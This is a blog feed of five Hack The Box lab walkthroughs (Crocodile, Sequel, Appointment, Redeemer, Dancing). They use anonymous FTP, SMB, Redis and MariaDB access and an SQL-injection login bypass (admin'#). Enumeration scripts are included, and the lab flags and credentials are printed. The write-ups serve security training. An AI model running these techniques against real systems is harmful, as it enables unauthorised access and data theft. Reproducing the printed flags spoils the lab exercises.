DEV Community: keyfive5 / Obsidian Signal

HTB Crocodile: From Anonymous FTP to Admin Panel for the Flag

keyfive5 / Obsidian Signal — Mon, 21 Apr 2025 03:04:20 +0000

Introduction

In this tutorial, we’ll chain an anonymous FTP leak into a hidden web admin login on Hack The Box’s Crocodile box to retrieve the flag.

You’ll learn to:

Enumerate FTP and download leaked credential files
Extract valid usernames/passwords
Use Gobuster to discover hidden web pages
Authenticate to a PHP login panel and capture the flag

Prerequisites

Kali Linux (or any distro with ftp, gobuster, curl)
HTB VPN connection

1. FTP Enumeration

nmap -sC -sV -p 21,80 <IP>
ftp <IP>
# login: anonymous
dir
get allowed.userlist
get allowed.userlist.passwd

Inspect the lists:

cat allowed.userlist
cat allowed.userlist.passwd

2. Extract Credentials

From allowed.userlist + .passwd, find a valid pair (e.g. admin / Supersecretpassword1).

3. Discover Hidden Pages

gobuster dir \
  --url http://<IP>/ \
  --wordlist /usr/share/wordlists/dirb/common.txt \
  -x php,html

Look for /login.php.

4. Admin Login & Flag

curl -d "username=admin&password=Supersecretpassword1" \
     http://<IP>/login.php

You’ll be redirected to the Admin panel—your flag is displayed at the top.

5. Lessons Learned

Anonymous services often leak credentials.
Combine leaked creds with web enumeration for full-chain exploits.
Automate with scripts in professional engagements.

🔗 Repo & full write‑up: https://github.com/keyfive5/obsidiansignal-htb-crocodile

Navigating MariaDB on HTB’s ‘Sequel’ Box to Retrieve the Flag

keyfive5 / Obsidian Signal — Sun, 20 Apr 2025 21:16:02 +0000

Introduction

In this guide, we’ll connect directly to the MariaDB instance on Hack The Box’s Sequel machine, enumerate its databases, tables, and extract the flag.

You’ll learn to:

Discover database services with nmap
Authenticate to MariaDB, including dealing with TLS issues
List databases and tables with SQL commands
Query tables to retrieve sensitive data (the flag)

Prerequisites

Kali Linux (or any distro with mysql-client)
Active HTB VPN connection

1. Scan for MySQL/MariaDB Service

Identify open database port:

nmap -sC -sV 10.129.28.113 -oN nmap-3306.txt

Output snippet

3306/tcp open  mysql?  MariaDB 10.3.27

2. Connect to the Database

Bypass TLS requirement in the MariaDB client:

mysql --ssl -h 10.129.28.113 -u root --skip-ssl

3. Enumerate Databases & Tables

List available databases:

SHOW DATABASES;

Select the target database:

USE htb;

List tables:

SHOW TABLES;

4. Retrieve the Flag

Inspect the config table for the flag:

SELECT * FROM config;

The value column for name = 'flag' contains:

7b4bec00d1a39e3dd4e021ec3d915da8

5. Automation Script

Automate enumeration with scripts/enum-mysql.sh:

bash scripts/enum-mysql.sh 10.129.28.113

6. Lessons Learned

Direct database access can bypass web app filters.
MariaDB often enforces TLS by default—be prepared to adjust client flags.
Standard SQL commands (SHOW DATABASES, SHOW TABLES) quickly reveal sensitive tables.

🔗 Full tutorial & repo: https://github.com/keyfive5/obsidiansignal-htb-sequel

Exploiting HTB’s ‘Appointment’ Box with SQL Injection

keyfive5 / Obsidian Signal — Sun, 20 Apr 2025 17:57:53 +0000

Introduction

In this tutorial, we’ll exploit an SQL Injection vulnerability in Hack The Box’s Appointment web app to bypass authentication and retrieve the flag.

You’ll learn to:

Discover targets with nmap
(Optionally) brute-force directories with gobuster
Craft an SQLi payload to bypass a login form
Automate the entire exploit with a Bash script

Prerequisites

Kali Linux (or any distro with nmap, gobuster, curl)
Active HTB VPN connection

1. Scan for Open Services

Identify the web server and version:

nmap -sC -sV 10.129.99.212 -oN screenshots/nmap.png

Output snippet

80/tcp open  http    Apache httpd 2.4.38 (Debian)

2. (Optional) Directory Brute-Force

Use Gobuster to check for hidden paths:

gobuster dir -u http://10.129.99.212 -w /usr/share/wordlists/dirb/common.txt -o screenshots/gobuster.png

No sensitive directories were found.

3. SQL Injection Exploitation

Target the login form with this payload:

Username: admin'#
Password: anything

This payload closes the username clause and comments out the rest of the SQL query, bypassing the password check.

curl -s -X POST http://10.129.99.212/login      -d "username=admin'#&password=dummy" -L

You should see a page indicating you are logged in as admin, revealing the flag.

Flag: e3d0796d002a446c0e622226f42e9672

4. Automation Script

Reproduce the exploit with scripts/login-sqli.sh:

bash scripts/login-sqli.sh 10.129.99.212

5. Lessons Learned

Unsanitized inputs on login forms lead to trivial SQLi bypass.
Always use parameterized queries or stored procedures.
Implement input validation and Web Application Firewalls.

🔗 Full write-up & code: https://github.com/keyfive5/obsidiansignal-htb-appointment

Exploiting HTB’s ‘Redeemer’ Box with Redis Misconfiguration

keyfive5 / Obsidian Signal — Sun, 20 Apr 2025 01:54:47 +0000

Introduction

In this tutorial, we’ll exploit a publicly exposed Redis service on Hack The Box’s Redeemer machine. You’ll learn to:

Discover Redis with nmap
Interact with Redis using redis-cli
List keys and extract values (including the flag)
Automate the entire flow in a Bash script

Prerequisites

Basic Linux command‑line skills
Kali Linux (or any distro with nmap & redis-cli)
Active HTB VPN connection

1. Scan for Redis

First, identify the open Redis port:

nmap -p 6379 -sV 10.129.136.194 -oN nmap-6379.txt

Output snippet

6379/tcp open  redis  Redis key-value store 5.0.7

2. Connect & Inspect

Use redis-cli to connect and gather server info:

redis-cli -h 10.129.136.194 info | tee redis-info.txt

Key output

# Keyspace
db0:keys=4,expires=0,avg_ttl=0

3. Retrieve the Flag

Select the database, list all keys, and get the flag:

redis-cli -h 10.129.136.194
> select 0
> keys *
1) "flag"
2) "temp"
3) "stor"
4) "numb"
> get flag
"03e1d2b376c37ab3f5319922053953eb"

![Flag Retrieval]((https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v67kyk93rxtstt9g3sm9.png)

4. Automation Script

Save the following as scripts/enum-redis.sh to automate the process:

#!/usr/bin/env bash
# Usage: ./enum-redis.sh <TARGET_IP>

TARGET=$1

echo "[*] Scanning for Redis..."
nmap -p 6379 -sV $TARGET -oN nmap-6379.txt

echo "[*] Gathering Redis INFO..."
redis-cli -h $TARGET info | tee redis-info.txt

echo "[*] Listing keys..."
redis-cli -h $TARGET --raw keys '*' | tee keys.txt

echo "[*] Retrieving flag..."
FLAG=$(redis-cli -h $TARGET get flag)
echo "[*] Flag: $FLAG"

Run it with:

bash scripts/enum-redis.sh 10.129.136.194

5. Lessons Learned

Public Redis installations often allow unauthenticated access by default.
Always run INFO and KEYS * to enumerate available data.
Automate repetitive enumeration tasks with simple Bash scripts.

Conclusion & Next Steps

You’ve now owned HTB’s Redeemer box by exploiting a Redis misconfiguration in under five commands. Next, consider:

Integrating Redis checks into your Recon automation.
Exploring authenticated Redis attacks (ACLs, password brute‑forcing).
Leveling up with lateral‑movement and persistence labs.

🔗 Full write‑up & code: https://github.com/keyfive5/obsidiansignal-htb-redeemer

Smashing HTB’s ‘Dancing’ with SMB Misconfigurations

keyfive5 / Obsidian Signal — Sat, 19 Apr 2025 10:16:09 +0000

Introduction

In this tutorial, we’ll walk through exploiting a poorly secured SMB share on the Hack The Box “Dancing” machine. By the end, you’ll be able to:

Enumerate SMB shares with nmap and smbclient
Identify guest/anonymous access permissions
Exfiltrate files and retrieve flags

Prerequisites

Basic Linux command‑line skills
Kali or any distro with nmap & smbclient installed or Parrot OS
HTB VPN connection

1. Port Scanning

nmap -sV 10.129.232.112
Output snippet:

2. SMB Share Enumeration

Next, list all SMB shares—attempting anonymous login:

smbclient -L //10.129.232.112 -N

Shares discovered:

ADMIN$     Disk      Remote Admin
C$         Disk      Default share
IPC$       IPC       Remote IPC
WorkShares Disk      Custom share

The WorkShares share looks custom and ripe for misconfiguration.

3. Connecting & Downloading**

3.1 Connect Anonymously
Jump into the WorkShares share without credentials:

smbclient //10.129.232.112/WorkShares -N

You’ll be dropped into an smb: prompt.

3.2 Exfiltrate Files

Grab worknotes.txt (lateral‑movement hints):

smb: \> cd Amy.J
smb: \Amy.J\> get worknotes.txt

- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing

Retrieve flag.txt:

smb: \> cd ../James.P
smb: \James.P\> get flag.txt

5f61c10dffbc77a704d76016a22f1664

3. Verify the flag:

cat flag.txt
# 5f61c10dffbc77a704d76016a22f1664

4. Automation Script
You can streamline this process with a simple Bash script:

#!/usr/bin/env bash
# scripts/enum-smb.sh
# Usage: ./enum-smb.sh <TARGET_IP>

TARGET=$1

echo "[*] Nmap scan..."
nmap -sV $TARGET -oN nmap.txt

echo "[*] SMB enumeration..."
smbclient -L //$TARGET -N -g | tee smb-list.txt

echo "[*] Pulling files..."
smbclient //$TARGET/WorkShares -N << 'EOF'
cd Amy.J
get worknotes.txt
cd ../James.P
get flag.txt
exit
EOF

echo "[*] Flag:"
cat flag.txt

Run it with:

bash scripts/enum-smb.sh 10.129.232.112

5. Lessons Learned

Enumerate custom shares (WorkShares, Public, etc.)—they’re often misconfigured.
smbclient -N quickly tests anonymous/guest access.
Automate routine recon to save time on engagements.

Conclusion & Next Steps

Misconfigured SMB remains a top attack vector. Practice on HTB boxes to sharpen your skills, then:

Integrate SMB checks into your Recon scripts
Explore authenticated SMB attacks (NTLM relay, pass‑the‑hash)
Level up with Windows privilege escalation labs

🔗 Full write‑up & code: https://github.com/keyfive5/obsidiansignal-htb-dancing